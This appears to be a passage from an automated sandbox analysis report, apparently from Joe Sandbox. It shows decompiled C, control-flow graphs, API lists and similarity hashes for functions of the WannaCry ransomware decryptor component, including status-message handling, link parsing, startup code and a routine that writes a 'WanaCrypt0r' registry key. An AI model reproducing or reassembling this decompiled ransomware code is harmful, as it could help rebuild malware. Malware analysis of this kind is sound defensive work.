                                  0x0040559e
                                  0x004055a9
                                  0x004055b2
                                  0x004055b4
                                  0x004055b8
                                  0x004055bd
                                  0x004055c1
                                  0x004055d0
                                  0x004055d5
                                  0x004055de
                                  0x004055e5
                                  0x004055ed
                                  0x004055f1
                                  0x004055f9
                                  0x004055fd
                                  0x00405601
                                  0x00405605
                                  0x0040560d
                                  0x0040561a
                                  0x00405620
                                  0x00405626
                                  0x0040562a
                                  0x0040563f
                                  0x00405641
                                  0x0040564c
                                  0x00405652
                                  0x00405657
                                  0x0040565c
                                  0x0040565d
                                  0x00405664
                                  0x00405666
                                  0x00405666
                                  0x00405669
                                  0x0040566a
                                  0x0040566e
                                  0x0040566f
                                  0x00405677
                                  0x0040567c
                                  0x0040567e
                                  0x00405686
                                  0x0040568c
                                  0x0040569e
                                  0x004056a4
                                  0x004056a8
                                  0x004056ac
                                  0x004056b2
                                  0x004056bc
                                  0x004056c8
                                  0x004056e7
                                  0x0040570b
                                  0x00405719
                                  0x0040571c
                                  0x0040571e
                                  0x00405721
                                  0x00000000
                                  0x00405723
                                  0x00405723
                                  0x00405729
                                  0x0040572d
                                  0x00000000
                                  0x0040572f
                                  0x0040572f
                                  0x00405734
                                  0x00000000
                                  0x00405736
                                  0x0040573a
                                  0x0040574c
                                  0x0040574e
                                  0x00405753
                                  0x00405757
                                  0x00000000
                                  0x00405757
                                  0x0040573a
                                  0x00405734
                                  0x0040572d
                                  0x00405729
                                  0x00000000
                                  0x0040575b
                                  0x00405763
                                  0x00405766
                                  0x00405766
                                  0x004056b2
                                  0x00405770
                                  0x00405770
                                  0x00405777
                                  0x00405779
                                  0x00405779
                                  0x0040577c
                                  0x00405781
                                  0x00405782
                                  0x0040578b
                                  0x0040579b
                                  0x004057a2
                                  0x004057a8
                                  0x004057b0
                                  0x004057b9
                                  0x004057c4
                                  0x004057c4
                                  0x004057d3
                                  0x004057e0

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #5785CreateDeleteObjectRect$#1168#1640#2405#2860#323#470#640#755BrushClientCompatibleFillSolid
                                  • String ID:
                                  • API String ID: 1233696098-0
                                  • Opcode ID: d2a394ca3572882bfb2f5d87bffa0f05435ffd103ecaeaaf491a49074e348053
                                  • Instruction ID: b627e9c1237585dd637a27707791d59f98fdace04f8481d3914a5fbe5096edf5
                                  • Opcode Fuzzy Hash: d2a394ca3572882bfb2f5d87bffa0f05435ffd103ecaeaaf491a49074e348053
                                  • Instruction Fuzzy Hash: 057135716087419FC324DF69C984AABB7E9FB88704F004A2EF59AC3350DB74E845CB66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401600 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 120windowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 336 401600-401614 337 4016e5-4016e7 336->337 338 40161a-40161b 336->338 339 401734-401737 337->339 340 4016e9-401731 #537 call 401970 SendMessageA #2385 337->340 341 40161d-40161e 338->341 342 40168f-401691 338->342 344 401743-401754 #2385 339->344 346 401739 339->346 341->344 345 401624-401626 341->345 347 401693-4016db #537 call 401970 SendMessageA #2385 342->347 348 4016de-4016e1 342->348 350 401628-40165b #537 call 401970 #2385 345->350 351 40165e-401661 345->351 346->344 348->344 353 4016e3 348->353 351->348 355 401663-40168c #537 call 401970 #2385 351->355 353->346
                                  C-Code - Quality: 65%
                                  			E00401600(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
				void* _t19;
				long _t21;
				long _t24;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				long _t48;
				void* _t49;
				intOrPtr _t50;

				_t27 = _a4;
				_t48 = _a8;
				_t19 = _t27 - 0x4e20;
				_t49 = __ecx;
				if(_t19 == 0) {
					if(_t48 != 0) {
						if(_t48 == 0xffffffff) {
							goto L14;
						}
						goto L15;
					} else {
						_push(__ecx);
						_a4 = _t50;
						L00412CAA();
						E00401970("Connected");
						_t21 = SendMessageA( *(_t49 + 0x80), 0x402, 0x1e, _t48);
						_push(_a4);
						_push(_t48);
						_push(_t27);
						 *(_t49 + 0xb0) = 0x23;
						L00412BAE();
						return _t21;
					}
				} else {
					_t19 = _t19 - 1;
					if(_t19 == 0) {
						if(_t48 != 0) {
							goto L9;
						} else {
							_push(__ecx);
							_a4 = _t50;
							L00412CAA();
							E00401970("Sent request");
							_t24 = SendMessageA( *(_t49 + 0x80), 0x402, 0x23, _t48);
							_push(_a4);
							_push(_t48);
							_push(_t27);
							 *(_t49 + 0xb0) = 0x28;
							L00412BAE();
							return _t24;
						}
					} else {
						_t19 = _t19 - 1;
						if(_t19 != 0) {
							L15:
							_push(_a12);
							_push(_t48);
							_push(_t27); // executed
							L00412BAE(); // executed
							return _t19;
						} else {
							if(_t48 != 0) {
								if(_t48 != 1) {
									L9:
									if(_t48 == 0xffffffff) {
										L14:
										 *((intOrPtr*)(_t49 + 0xa8)) = 0xffffffff;
									}
									goto L15;
								} else {
									_push(__ecx);
									_a4 = _t50;
									L00412CAA();
									_t25 = E00401970("Succeed");
									_push(_a4);
									_push(_t48);
									_push(_t27);
									L00412BAE();
									return _t25;
								}
							} else {
								_push(__ecx);
								_a4 = _t50;
								L00412CAA();
								_t26 = E00401970("Received response");
								_push(_a4);
								_push(_t48);
								_push(_t27);
								 *((intOrPtr*)(_t49 + 0xa8)) = 1;
								L00412BAE();
								return _t26;
							}
						}
					}
				}
			}












                                  0x00401601
                                  0x00401609
                                  0x0040160d
                                  0x00401612
                                  0x00401614
                                  0x004016e7
                                  0x00401737
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004016e9
                                  0x004016e9
                                  0x004016ec
                                  0x004016f5
                                  0x004016fc
                                  0x00401710
                                  0x0040171c
                                  0x0040171d
                                  0x0040171e
                                  0x0040171f
                                  0x00401729
                                  0x00401731
                                  0x00401731
                                  0x0040161a
                                  0x0040161a
                                  0x0040161b
                                  0x00401691
                                  0x00000000
                                  0x00401693
                                  0x00401693
                                  0x00401696
                                  0x0040169f
                                  0x004016a6
                                  0x004016ba
                                  0x004016c6
                                  0x004016c7
                                  0x004016c8
                                  0x004016c9
                                  0x004016d3
                                  0x004016db
                                  0x004016db
                                  0x0040161d
                                  0x0040161d
                                  0x0040161e
                                  0x00401743
                                  0x00401749
                                  0x0040174a
                                  0x0040174b
                                  0x0040174c
                                  0x00401754
                                  0x00401624
                                  0x00401626
                                  0x00401661
                                  0x004016de
                                  0x004016e1
                                  0x00401739
                                  0x00401739
                                  0x00401739
                                  0x00000000
                                  0x00401663
                                  0x00401663
                                  0x00401666
                                  0x0040166f
                                  0x00401676
                                  0x00401681
                                  0x00401682
                                  0x00401683
                                  0x00401684
                                  0x0040168c
                                  0x0040168c
                                  0x00401628
                                  0x00401628
                                  0x0040162b
                                  0x00401634
                                  0x0040163b
                                  0x00401646
                                  0x00401647
                                  0x00401648
                                  0x00401649
                                  0x00401653
                                  0x0040165b
                                  0x0040165b
                                  0x00401626
                                  0x0040161e
                                  0x0040161b

                                  APIs
                                  • #2385.MFC42 ref: 00401653
                                  • #537.MFC42(Received response), ref: 00401634
                                    • Part of subcall function 00401970: #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
                                    • Part of subcall function 00401970: #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
                                    • Part of subcall function 00401970: #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF
                                  • #537.MFC42(Succeed), ref: 0040166F
                                  • #2385.MFC42(?,?,?,Succeed), ref: 00401684
                                  • #537.MFC42(Sent request), ref: 0040169F
                                  • SendMessageA.USER32(?,00000402,00000023,?), ref: 004016BA
                                  • #2385.MFC42 ref: 004016D3
                                  • #537.MFC42(Connected), ref: 004016F5
                                  • SendMessageA.USER32(?,00000402,0000001E,?), ref: 00401710
                                  • #2385.MFC42 ref: 00401729
                                  • #2385.MFC42(?,?,?), ref: 0040174C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2385$#537$MessageSend$#3092#6199#800
                                  • String ID: Connected$Received response$Sent request$Succeed
                                  • API String ID: 3790904636-3692714192
                                  • Opcode ID: 4248ce8c7a47d30574ec48fc369442f637571c250744fd81582f6567f40f10fe
                                  • Instruction ID: e9690c31fbc1831b63af9a5cc079f352e9ea826ed21b4fe1124c0ccffc889961
                                  • Opcode Fuzzy Hash: 4248ce8c7a47d30574ec48fc369442f637571c250744fd81582f6567f40f10fe
                                  • Instruction Fuzzy Hash: A631E8B130430067C5209F1AD959EAF7B69EBD4BB4F10852FF149A33D1CA795C4582FA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004063A0 Relevance: 22.6, APIs: 15, Instructions: 82COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 370 4063a0-4064b5 #2302 * 12 #2370 * 3
                                  APIs
                                  • #2302.MFC42(?,0000040F,?), ref: 004063B2
                                  • #2302.MFC42(?,000003EC,?,?,0000040F,?), ref: 004063C4
                                  • #2302.MFC42(?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063D6
                                  • #2302.MFC42(?,000003F3,?,?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063E8
                                  • #2302.MFC42(?,000003F4,?,?,000003F3,?,?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063FA
                                  • #2302.MFC42(?,000003F5,?,?,000003F4,?,?,000003F3,?,?,000003EB,?,?,000003EC,?,?), ref: 0040640C
                                  • #2302.MFC42(?,000003F2,?,?,000003F5,?,?,000003F4,?,?,000003F3,?,?,000003EB,?,?), ref: 0040641E
                                  • #2302.MFC42(?,000003EE,?,?,000003F2,?,?,000003F5,?,?,000003F4,?,?,000003F3,?,?), ref: 00406430
                                  • #2302.MFC42(?,000003F9,?,?,000003EE,?,?,000003F2,?,?,000003F5,?,?,000003F4,?,?), ref: 00406442
                                  • #2302.MFC42(?,00000401,?,?,000003F9,?,?,000003EE,?,?,000003F2,?,?,000003F5,?,?), ref: 00406454
                                  • #2302.MFC42(?,000003FD,?,?,00000401,?,?,000003F9,?,?,000003EE,?,?,000003F2,?,?), ref: 00406466
                                  • #2302.MFC42(?,000003E8,?,?,000003FD,?,?,00000401,?,?,000003F9,?,?,000003EE,?,?), ref: 00406478
                                  • #2370.MFC42(?,000003FF,?,?,000003E8,?,?,000003FD,?,?,00000401,?,?,000003F9,?,?), ref: 0040648A
                                  • #2370.MFC42(?,000003FC,?,?,000003FF,?,?,000003E8,?,?,000003FD,?,?,00000401,?,?), ref: 0040649C
                                  • #2370.MFC42(?,000003EF,?,?,000003FC,?,?,000003FF,?,?,000003E8,?,?,000003FD,?,?), ref: 004064AE
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2302$#2370
                                  • String ID:
                                  • API String ID: 1711274145-0
                                  • Opcode ID: f4b882eb859de0a193a05a3978ec51d1331cae20c00cf70a3d190a6334ff0923
                                  • Instruction ID: 0d28d22553b71fc94a0ee6c66579bb390b9294cd647fac9b7e1ecc0347327b15
                                  • Opcode Fuzzy Hash: f4b882eb859de0a193a05a3978ec51d1331cae20c00cf70a3d190a6334ff0923
                                  • Instruction Fuzzy Hash: 32218E711806017FE22AE365CD82FFFA26CEF85B04F00452EB369951C1BBE8365B5665
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406DC0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 103windowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 371 406dc0-406dfa SendMessageA #823 372 406e00-406e08 371->372 373 406edf-406ee6 371->373 374 406e0a-406e0c 372->374 375 406e0e 372->375 376 406e11-406e29 SendMessageA 374->376 375->376 377 406ed2-406edc #825 376->377 378 406e2f-406e49 _strnicmp 376->378 377->373 379 406e67-406e6c 378->379 380 406e4b-406e65 _strnicmp 378->380 381 406ec9-406ecc 379->381 382 406e6e 379->382 380->379 380->381 381->377 381->378 383 406e72-406e76 382->383 384 406e78-406e7b 383->384 385 406e7f-406e85 383->385 384->383 386 406e7d 384->386 385->381 387 406e87-406ec4 SendMessageA #6136 385->387 386->381 387->381
                                  C-Code - Quality: 64%
                                  			E00406DC0(void* __ecx) {
				int _v76;
				int _v80;
				char _v84;
				int _v88;
				long _v92;
				void* _v96;
				int _v100;
				void* _v104;
				long _t28;
				void* _t29;
				struct HWND__* _t30;
				int _t32;
				void* _t35;
				int _t39;
				long _t47;
				int _t48;
				void* _t51;

				_t35 = __ecx;
				_t48 = 0;
				_t28 = SendMessageA( *(__ecx + 0x4e0), 0xe, 0, 0);
				_t47 = _t28;
				_v96 = 0;
				_v92 = _t47;
				_t4 = _t47 + 1; // 0x1
				L00412CEC();
				_t51 =  &_v104 + 4;
				_v88 = _t28;
				if(_t28 == 0) {
					return _t28;
				}
				_t29 = _t35 + 0x4c0;
				if(_t29 != 0) {
					_t30 =  *(_t29 + 0x20);
				} else {
					_t30 = 0;
				}
				SendMessageA(_t30, 0x44b, _t48,  &_v96); // executed
				_t32 = _v88;
				 *((char*)(_t32 + _t47)) = 0;
				if(_t47 < 0) {
					L15:
					_push(_v88);
					L00412C98();
					return _t32;
				} else {
					do {
						__imp___strnicmp(_t48 + _v88, "<http://", 8);
						_t51 = _t51 + 0xc;
						if(_t32 == 0) {
							L7:
							_t48 = _t48 + 1;
							_t39 = _t48;
							if(_t48 > _t47) {
								goto L14;
							}
							_t32 = _v88;
							while( *((char*)(_t48 + _t32)) != 0x3e) {
								_t48 = _t48 + 1;
								if(_t48 <= _t47) {
									continue;
								}
								goto L14;
							}
							_t32 = _t48;
							_t48 = _t48 + 1;
							if(_t32 != 0xffffffff) {
								_v100 = _t32;
								_v104 = _t39;
								SendMessageA( *(_t35 + 0x4e0), 0x437, 0,  &_v104);
								_t32 = 0x20;
								_push( &_v84);
								_v84 = 0x54;
								_v76 = 0x20;
								_v80 = 0x20;
								L00412F4A();
							}
							goto L14;
						}
						_t32 = _v88;
						__imp___strnicmp(_t48 + _t32, "<https://", 9);
						_t51 = _t51 + 0xc;
						if(_t32 != 0) {
							goto L14;
						}
						goto L7;
						L14:
						_t48 = _t48 + 1;
					} while (_t48 <= _t47);
					goto L15;
				}
			}




















                                  0x00406dcc
                                  0x00406dce
                                  0x00406ddc
                                  0x00406dde
                                  0x00406de0
                                  0x00406de4
                                  0x00406de8
                                  0x00406dec
                                  0x00406df1
                                  0x00406df6
                                  0x00406dfa
                                  0x00406ee6
                                  0x00406ee6
                                  0x00406e00
                                  0x00406e08
                                  0x00406e0e
                                  0x00406e0a
                                  0x00406e0a
                                  0x00406e0a
                                  0x00406e1d
                                  0x00406e1f
                                  0x00406e25
                                  0x00406e29
                                  0x00406ed2
                                  0x00406ed6
                                  0x00406ed7
                                  0x00000000
                                  0x00406e2f
                                  0x00406e2f
                                  0x00406e3e
                                  0x00406e44
                                  0x00406e49
                                  0x00406e67
                                  0x00406e67
                                  0x00406e6a
                                  0x00406e6c
                                  0x00000000
                                  0x00000000
                                  0x00406e6e
                                  0x00406e72
                                  0x00406e78
                                  0x00406e7b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406e7d
                                  0x00406e7f
                                  0x00406e81
                                  0x00406e85
                                  0x00406e8b
                                  0x00406e9e
                                  0x00406ea2
                                  0x00406ea8
                                  0x00406ead
                                  0x00406eb4
                                  0x00406ebc
                                  0x00406ec0
                                  0x00406ec4
                                  0x00406ec4
                                  0x00000000
                                  0x00406e85
                                  0x00406e4b
                                  0x00406e5a
                                  0x00406e60
                                  0x00406e65
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406ec9
                                  0x00406ec9
                                  0x00406eca
                                  0x00000000
                                  0x00406e2f

                                  APIs
                                  • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 00406DDC
                                  • #823.MFC42(00000001,?,?), ref: 00406DEC
                                  • SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406E1D
                                  • _strnicmp.MSVCRT ref: 00406E3E
                                  • _strnicmp.MSVCRT ref: 00406E5A
                                  • SendMessageA.USER32(?,00000437,00000000,?), ref: 00406EA2
                                  • #6136.MFC42 ref: 00406EC4
                                  • #825.MFC42(?), ref: 00406ED7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$_strnicmp$#6136#823#825
                                  • String ID: <http://$<https://$T
                                  • API String ID: 1228111698-1216084165
                                  • Opcode ID: cdce9b46107efdddb91857a97f1fff2144e6341c78577d605c9c0136cf899573
                                  • Instruction ID: 32e461136b03d60599108953de6477053a568cccd29e118696d71e5d9ed076ef
                                  • Opcode Fuzzy Hash: cdce9b46107efdddb91857a97f1fff2144e6341c78577d605c9c0136cf899573
                                  • Instruction Fuzzy Hash: 7E31D6B52043509BD320CF18CC41FABB7E4BB98704F044A3EF98AD7281E678D95987D9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00413102 Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 388 413102-413177 __set_app_type __p__fmode __p__commode call 4133c7 391 413185-4131dc call 4133b2 _initterm __getmainargs _initterm 388->391 392 413179-413184 __setusermatherr 388->392 395 413218-41321b 391->395 396 4131de-4131e6 391->396 392->391 397 4131f5-4131f9 395->397 398 41321d-413221 395->398 399 4131e8-4131ea 396->399 400 4131ec-4131ef 396->400 402 4131fb-4131fd 397->402 403 4131ff-413210 GetStartupInfoA 397->403 398->395 399->396 399->400 400->397 401 4131f1-4131f2 400->401 401->397 402->401 402->403 404 413223-413225 403->404 405 413212-413216 403->405 406 413226-413231 GetModuleHandleA call 4133e6 404->406 405->406 408 413236-413253 exit _XcptFilter 406->408
                                  C-Code - Quality: 80%
                                  			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t23;
				intOrPtr* _t24;
				void* _t27;
				void _t29;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x41baa8);
				_push(0x413050);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x422298 =  *0x422298 | 0xffffffff;
				 *0x42229c =  *0x42229c | 0xffffffff;
				_t23 = __p__fmode();
				_t46 =  *0x42228c; // 0x0
				 *_t23 = _t46;
				_t24 = __p__commode();
				_t47 =  *0x422288; // 0x0
				 *_t24 = _t47;
				 *0x422294 = _adjust_fdiv;
				_t27 = E004133C7( *_adjust_fdiv);
				_t61 =  *0x421790; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E004133C4);
				}
				E004133B2(_t27);
				_push(0x41f018);
				_push(0x41f014);
				L004133AC();
				_t29 =  *0x422284; // 0x0
				_v112 = _t29;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x422280,  &_v112);
				_push(0x41f010);
				_push(0x41f000);
				L004133AC();
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96); // executed
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_t40 = E004133E6(GetModuleHandleA(0), _t39, 0, _t55, _t38);
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L004133A6();
				return _t41;
			}





























                                  0x00413105
                                  0x00413107
                                  0x0041310c
                                  0x00413117
                                  0x00413118
                                  0x00413125
                                  0x0041312a
                                  0x0041312f
                                  0x00413136
                                  0x0041313d
                                  0x00413144
                                  0x0041314a
                                  0x00413150
                                  0x00413152
                                  0x00413158
                                  0x0041315e
                                  0x00413167
                                  0x0041316c
                                  0x00413171
                                  0x00413177
                                  0x0041317e
                                  0x00413184
                                  0x00413185
                                  0x0041318a
                                  0x0041318f
                                  0x00413194
                                  0x00413199
                                  0x0041319e
                                  0x004131b7
                                  0x004131bd
                                  0x004131c2
                                  0x004131c7
                                  0x004131d4
                                  0x004131d6
                                  0x004131dc
                                  0x00413218
                                  0x0041321d
                                  0x0041321e
                                  0x0041321e
                                  0x004131de
                                  0x004131de
                                  0x004131de
                                  0x004131df
                                  0x004131e2
                                  0x004131e4
                                  0x004131ef
                                  0x004131f1
                                  0x004131f1
                                  0x004131f2
                                  0x004131f2
                                  0x004131ef
                                  0x004131f5
                                  0x004131f9
                                  0x00000000
                                  0x00000000
                                  0x004131ff
                                  0x00413206
                                  0x00413210
                                  0x00413225
                                  0x00413212
                                  0x00413212
                                  0x00413212
                                  0x00413231
                                  0x00413236
                                  0x0041323a
                                  0x00413240
                                  0x00413245
                                  0x00413247
                                  0x0041324a
                                  0x0041324b
                                  0x0041324c
                                  0x00413253

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                  • String ID:
                                  • API String ID: 801014965-0
                                  • Opcode ID: 9f29f74fa0ca4091ce937db24ce742eca73e17089ce00c114469281514e7078a
                                  • Instruction ID: fcecf6e401754473f6225594f41014142e7d5ca2867d00c097f2044c16acc313
                                  • Opcode Fuzzy Hash: 9f29f74fa0ca4091ce937db24ce742eca73e17089ce00c114469281514e7078a
                                  • Instruction Fuzzy Hash: F9419F71940308EFCB20DFA4DC45AE97BB9EB09711B20016FF855972A1D7788A81CB6C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401C70 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 114registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 84%
                                  			E00401C70(signed int _a4) {
				void _v519;
				char _v520;
				void _v700;
				short _v720;
				int _v724;
				void* _v728;
				int _t30;
				void* _t36;
				signed int _t38;
				signed int _t46;
				signed int _t56;
				int _t72;
				void* _t77;

				_t30 = memset( &_v700, memcpy( &_v720, L"Software\\", 5 << 2), 0x2d << 2);
				_v520 = _t30;
				memset( &_v519, _t30, 0x81 << 2);
				asm("stosw");
				asm("stosb");
				_v728 = 0;
				wcscat( &_v720, L"WanaCrypt0r");
				_t72 = 0;
				_v724 = 0;
				do {
					if(_t72 != 0) {
						RegCreateKeyW(0x80000001,  &_v720,  &_v728);
					} else {
						RegCreateKeyW(0x80000002,  &_v720,  &_v728);
					}
					_t36 = _v728;
					if(_t36 == 0) {
						goto L10;
					} else {
						_t56 = _a4;
						if(_t56 == 0) {
							_v724 = 0x207;
							_t38 = RegQueryValueExA(_t36, "wd", 0, 0,  &_v520,  &_v724); // executed
							asm("sbb esi, esi");
							_t77 =  ~_t38 + 1;
							if(_t77 != 0) {
								SetCurrentDirectoryA( &_v520);
							}
						} else {
							GetCurrentDirectoryA(0x207,  &_v520);
							asm("repne scasb");
							_t46 = RegSetValueExA(_v728, "wd", 0, 1,  &_v520,  !(_t56 | 0xffffffff));
							_t72 = _v724;
							asm("sbb esi, esi");
							_t77 =  ~_t46 + 1;
						}
						RegCloseKey(_v728); // executed
						if(_t77 != 0) {
							return 1;
						} else {
							goto L10;
						}
					}
					L13:
					L10:
					_t72 = _t72 + 1;
					_v724 = _t72;
				} while (_t72 < 2);
				return 0;
				goto L13;
			}
















                                  0x00401c95
                                  0x00401ca3
                                  0x00401caf
                                  0x00401cb1
                                  0x00401cb3
                                  0x00401cb8
                                  0x00401cc1
                                  0x00401cd6
                                  0x00401cd8
                                  0x00401cdc
                                  0x00401cde
                                  0x00401d00
                                  0x00401ce0
                                  0x00401d00
                                  0x00401d00
                                  0x00401d06
                                  0x00401d0c
                                  0x00000000
                                  0x00401d12
                                  0x00401d12
                                  0x00401d1b
                                  0x00401d79
                                  0x00401d81
                                  0x00401d8b
                                  0x00401d8d
                                  0x00401d8e
                                  0x00401d98
                                  0x00401d98
                                  0x00401d1d
                                  0x00401d2a
                                  0x00401d38
                                  0x00401d53
                                  0x00401d55
                                  0x00401d5d
                                  0x00401d5f
                                  0x00401d5f
                                  0x00401da3
                                  0x00401dab
                                  0x00401dd7
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00401dab
                                  0x00000000
                                  0x00401dad
                                  0x00401dad
                                  0x00401db1
                                  0x00401db1
                                  0x00401dc7
                                  0x00000000

                                  APIs
                                  • wcscat.MSVCRT ref: 00401CC1
                                  • RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 00401D00
                                  • GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 00401D2A
